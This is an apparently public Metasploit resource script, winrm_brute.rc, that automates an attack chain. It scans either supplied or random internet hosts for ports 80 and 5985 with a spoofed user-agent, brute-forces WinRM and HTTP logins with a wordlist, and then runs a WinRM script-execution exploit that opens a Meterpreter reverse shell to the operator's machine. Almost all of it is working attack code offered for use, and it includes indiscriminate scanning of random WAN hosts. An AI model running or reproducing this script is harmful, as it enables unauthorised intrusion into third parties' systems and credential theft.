   <ruby>
      run_single("workspace -a redteam")
      help = %Q|

        Description:
          setg SAVE_DB true - Save workspace redteam to database.xml
          setg LIMMIT 1000 - Limmit the number of random WAN hosts to search
          setg RANDOM_HOSTS true - To instruct db_nmap to random search in WAN for hosts with ports open
          setg RHOSTS 154.208.147.160 71.190.221.109 - To instruct db_nmap to scan hosts for ports open.
          setg USERPASS_FILE /root/my_dicionary.txt - To instruct auxiliarys to use our own dicionary file
          winrm_brute.rc will use nmap to populate the msfdb database with remote hosts address then it
          triggers msf auxiliary/scanners based on host(s) open port(s) and service name discovery.
          This module probes for 80:5985 remote TCP ports in open state.

        Execute in msfconsole:
          setg SAVE_DB <true-or-blank>
          setg LIMMIT <number-of-rhosts>
          setg RANDOM_HOSTS <true-or-blank>
          setg RHOSTS <hosts-separated-by-spaces>
          setg USERPASS_FILE <absoluct-path-to-dicionary.txt>
          resource <path-to-script>/winrm_brute.rc

        Author:
          r00t-3xp10it  <pedroubuntu10[at]gmail.com>
      |
      print_line(help)
      Rex::sleep(1.5)
      print_line("")


      ## Make sure we are connected to db
      unless framework.db.active
        print_error("[ERROR] Database not connected to postgresql.")
        print_warning("[execute] service postgresql start")
        run_single("exit")
        return nil
      else
        print_good("Database connected to postgresql.")
        Rex::sleep(0.5)
        work_name = framework.db.workspace.name
        local = Dir.pwd
        print_status("Working in workspace: *#{work_name}")
        Rex::sleep(1.0)
      end

      ## Sellect the type of nmap scan to use
      if (framework.datastore['RANDOM_HOSTS'] == "true")
         if (framework.datastore['LIMMIT'] == nil or framework.datastore['LIMMIT'] == '')
           run_single("setg LIMMIT 300")
           print_line("RHOSTS => Random Search in WAN for:#{framework.datastore['LIMMIT']} alive hosts")
         else
           print_line("LIMMIT => #{framework.datastore['LIMMIT']}")
           print_line("RHOSTS => Random Search in WAN for:#{framework.datastore['LIMMIT']} alive hosts")
         end
      elsif (framework.datastore['RHOSTS'] == nil or framework.datastore['RHOSTS'] == '')
         run_single("setg RHOSTS 192.168.1.0/24")
      elsif (framework.datastore['RHOSTS'])
         print_line("RHOSTS => #{framework.datastore['RHOSTS']}")
      end

      ## Metasploit auxiliarys brute force dicionary absoluct path
      if (framework.datastore['USERPASS_FILE'] == nil or framework.datastore['USERPASS_FILE'] == '')
         # setg USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/piata_ssh_userpass.txt
         run_single("setg USERPASS_FILE #{local}/bin/multi_services_wordlist.txt")
      else
         print_line("USERPASS_FILE => #{framework.datastore['USERPASS_FILE']}")
      end

      ## db_nmap WAN or RHOSTS or LOCAL_LAN scan settings
      # HINT: nmap will use a fake user-agent string (iPhone:Safari) while scanning.
      unless (framework.datastore['RANDOM_HOSTS'] == "true")
         run_single("db_nmap -sV -Pn -T4 -O -p 80,5985 --open --script=http-headers.nse,smb-os-discovery.nse --script-args http.useragent=\"Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_5 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0 Mobile/15D60 Safari/604.1\" #{framework.datastore['RHOSTS']}")
      else
         print_good("Nmap: search for random remote hosts with ports 80:5985 open")
         run_single("db_nmap -sV -Pn -T5 -O -iR #{framework.datastore['LIMMIT']} -p 80,5985 --open --script=http-headers.nse,smb-os-discovery.nse --script-args http.useragent=\"Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_5 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0 Mobile/15D60 Safari/604.1\"")
      end

      ## Read the database 
      run_single("spool winrm_brute.log")
      print_line("")
      run_single("services")
      print_good("Sellecting target hosts from msf database.")
      xhost = framework.db.hosts.map(&:address).join(' ')
      xport = framework.db.services.map(&:port).join(' ')
      proto = framework.db.services.map(&:proto).join(' ')
      xname = framework.db.hosts.map(&:os_name).join(' ').gsub(' ',', ')
      print_status("Target systems detected: #{xname}")
      run_single("setg RHOSTS #{xhost}")
      Rex::sleep(2.0)

         ## Make sure that exists hosts/ports (open) in database
         if xhost.nil? or xhost == '' or xhost == ' '
              print_error("[ERROR] db_nmap scan did not find any alive connections.")
              print_error("please wait, cleaning recent configurations.")
              Rex::sleep(1.0)
              run_single("unsetg all")
              File.delete('winrm_brute.log')
              run_single("workspace -d redteam")
              return nil
         elsif xport.nil? or xport == '' or xport == ' '
              print_error("[ERROR] db_nmap did not find any 80:5985 open ports.")
              print_error("please wait, cleaning recent configurations.")
              Rex::sleep(1.0)
              run_single("unsetg all")
              File.delete('winrm_brute.log')
              run_single("workspace -d redteam")
              return nil
         end

         ## Make sure that dicionary file exist (user:pass)
         check_word = "#{framework.datastore['USERPASS_FILE']}"
         unless (File.exist?(check_word))
              print_error("[ERROR] Dicionary absoluct path not found.")
              print_error("USERPASS_FILE => #{framework.datastore['USERPASS_FILE']}")
              Rex::sleep(1.0)
           word = %Q|

    [execute] setg USERPASS_FILE <absoluct-path-to-dicionary.txt>
    [example] setg USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/piata_ssh_userpass.txt
    'Remmenber that worldlist must be in user:pass format (one-per-line)'
    'Then we are able to run this resource script again'

           |
           print_line(word)
           print_error("Please wait, cleaning recent configurations.")
           Rex::sleep(1.0)
            run_single("unsetg all")
            File.delete('winrm_brute.log')
            run_single("workspace -d redteam")
            return nil
         end


         ## Run gather/brute-force modules
         if xport =~ /5985/ or proto =~ /(winrm|wsman|wsmans)/i
            com = `ifconfig wlan0 | grep -w 'inet' | awk {'print $2'}`
              print_warning("Remote Target port 5985 winrm found.")
              Rex::sleep(1.0)
              run_single("use auxiliary/scanner/winrm/winrm_auth_methods")
              run_single("set THREADS 10")
              print_line("")
              run_single("services -c name -S winrm -R")
              run_single("exploit")
              Rex::sleep(1.5)
              run_single("use auxiliary/scanner/winrm/winrm_login")
              run_single("set USERPASS_FILE #{framework.datastore['USERPASS_FILE']}")
              run_single("set STOP_ON_SUCCESS true")
              run_single("set VERBOSE true")
              run_single("set THREADS 10")
              print_line("")
              run_single("services -c name -S winrm -R")
              run_single("exploit")
              Rex::sleep(1.5)

                 ## User Inputs (username|password)
                 print "[+] Remote winrm USERNAME: "
                 user_name = gets.chomp
                 if user_name.nil? or user_name == '' or user_name == ' '
                    user_name = "Administrator"
                 end
                 print "[+] Remote winrm PASSWORD: "
                 user_pass = gets.chomp
                 if user_pass.nil? or user_pass == '' or user_pass == ' '
                    user_pass = "Administrator"
                 end

              run_single("use exploit/windows/winrm/winrm_script_exec")
              run_single("set USERNAME #{user_name}")
              run_single("set PASSWORD #{user_pass}")
              run_single("set VERBOSE true")
              run_single("set THREADS 10")
              run_single("set LHOST #{com}")
              run_single("set LPORT 445")
              run_single("set PAYLOAD windows/meterpreter/reverse_tcp")
              print_line("")
              run_single("services -c name -S winrm -R")
              run_single("exploit")
              Rex::sleep(1.5)
         end

         if xport =~ /80/ or proto =~ /http/i
              print_warning("Remote Target port: 80 http found")
              Rex::sleep(1.0)
              run_single("use auxiliary/scanner/http/title")
              print_line("")
              run_single("services -c name -S http -R")
              run_single("exploit")
              run_single("use auxiliary/scanner/http/options")
              run_single("set THREADS 11")
              print_line("")
              run_single("services -c name -S http -R")
              run_single("exploit")
              run_single("use auxiliary/scanner/http/dir_scanner")
              run_single("exploit")
              run_single("use auxiliary/scanner/http/http_login")
              run_single("set STOP_ON_SUCCESS true")
              run_single("set THREADS 16")
              print_line("")
              run_single("services -c name -S http -R")
              run_single("exploit")
         end


      ## Save current database to local file (database.xml)
      if (framework.datastore['SAVE_DB'] == "true")
         rand = Rex::Text.rand_text_alpha(5)
         print_warning("Exporting database to: #{local}/database_#{rand}.xml")
         run_single("db_export -f xml -a #{local}/database_#{rand}.xml")
      end

      ## Cleaning database and unset global variables
      print_warning("Please wait, Cleaning global variables.")
      Rex::sleep(1.5)
      run_single("unsetg all")
      run_single("unset all")
      run_single("workspace -d redteam")
      run_single("back")

      print_warning("Logfile stored under: #{local}/winrm_brute.log")
      print_warning("https://github.com/r00t-3xp10it/hacking-material-books/blob/master/metasploit-RC%5BERB%5D/metasploit_resource_files.md")
   </ruby>
